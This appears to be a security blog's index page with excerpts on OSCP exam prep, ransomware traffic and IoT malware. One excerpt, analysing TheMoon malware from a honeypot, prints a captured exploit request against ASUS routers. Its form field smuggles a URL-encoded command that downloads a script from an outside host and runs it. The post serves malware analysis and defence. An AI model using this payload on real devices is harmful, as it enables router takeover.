How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide – Recon & Scanning PART 1

Passing the Offensive Security Certified Professional Exam is not like passing any other exam. This isn't a multiple-choice, "what runs on port 22?" Security+-style brain-dump exam. It is a 24-hour, hands-on, prove-you-have-what-it-takes exam. If you think you're up to the challenge, we have created a… Read More »

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots. This bot belongs to the TheMoon family of malware. The vulnerable ASUS router will download and execute the binary file .nttpd from the attacker-controlled website. POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host: 81.171.12.232\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1' https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/ Antivirus… Read More »

CERBER Ransomware Hidden C2 Servers Traffic and Malware Analysis

Cerber ransomware has been one of the most prolific crimeware botnets to have arisen; it is currently generating an estimated $2.5 million a year, and rising. Once infected, your content is encrypted and held for ransom, as the name implies. You will see an image pop up with instructions on how to reclaim your data… Read More »

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

Example of files that were encrypted and protected: The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process. 2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1 GET //up1/1/4fv3b5.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0… Read More »

Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!

What is the Internet of Things (IoT)? In today's technological expansion everything seems to be connected to the Internet. For instance, in my own home I have my refrigerator, thermostat, video cameras, tablets, cell phone, TV, Xbox, DirecTV box, printer, security system, laptops, servers, workstations, Ethernet tap, a switch and a router all connected… Read More »